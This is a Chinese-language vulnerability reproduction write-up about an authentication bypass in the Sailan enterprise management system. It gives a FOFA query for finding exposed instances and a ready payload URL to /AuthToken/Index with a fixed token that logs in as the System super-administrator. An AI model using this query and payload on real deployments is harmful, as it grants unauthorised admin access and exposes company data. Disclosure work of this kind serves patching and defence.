漏洞复现-赛蓝-企业管理系统

本文来自无问社区,更多漏洞复现可前往查看http://www.wwlib.cn/index.php/index

0x01 产品简介

赛蓝企业管理系统是一款为企业提供全面管理解决方案的软件系统,它能够帮助企业实现精细化管理,提高效率,降低成本。系统集成了多种管理功能,包括但不限于项目管理、财务管理、采购管理、销售管理以及报表分析等,旨在为企业提供一站式的管理解决方案。该系统以先进的管理思想为引导,结合企业实际业务流程,通过信息化手段提升企业管理水平。

0x02 漏洞概述

赛蓝企业管理系统 AuthToken/Index 接口存在身份认证绕过漏洞,未授权的远程攻击者可以利用此接口构造token绕过身份认证,使用超级管理员账户登录系统后台,造成信息泄露或者恶意破坏,使系统处于极不安全的状态。

建议升级到最新版本

已修复

0x03 复现环境

复制代码
FOFA:body="www.cailsoft.com" || body="赛蓝企业管理系统"

payload:

复制代码
/AuthToken/Index?loginName=System&token=c94ad0c0aee8b1f23b138484f014131f

效果图:

相关推荐
JXY_AI2 小时前
大模型越狱:技术漏洞与安全挑战——从原理到防御
安全
上海云盾-高防顾问2 小时前
SCDN如何有效防护网站免受CC攻击?——安全加速网络的实战解析
网络·安全
riusksk2 小时前
网络安全顶会——SP 2025 论文清单与摘要
安全·web安全
闪电麦坤952 小时前
思路解析:第一性原理解 SQL
服务器·数据库·sql
珹洺3 小时前
数据库系统概论(八)SQL单表查询语言超详细讲解(附带例题表格对比带你一步步掌握)
数据库·sql
LJianK112 小时前
关系型数据库和非关系型数据库
sql
FreeBuf_13 小时前
GNU Screen 曝多漏洞:本地提权与终端劫持风险浮现
安全·web安全·gnu
多多*13 小时前
算法竞赛相关 Java 二分模版
java·开发语言·数据结构·数据库·sql·算法·oracle
安 当 加 密14 小时前
hashicorp vault机密管理系统的国产化替代:安当SMS凭据管理系统,量子安全赋能企业密钥管理
安全
码农黛兮_4615 小时前
SQL 索引优化指南:原理、知识点与实践案例
数据库·sql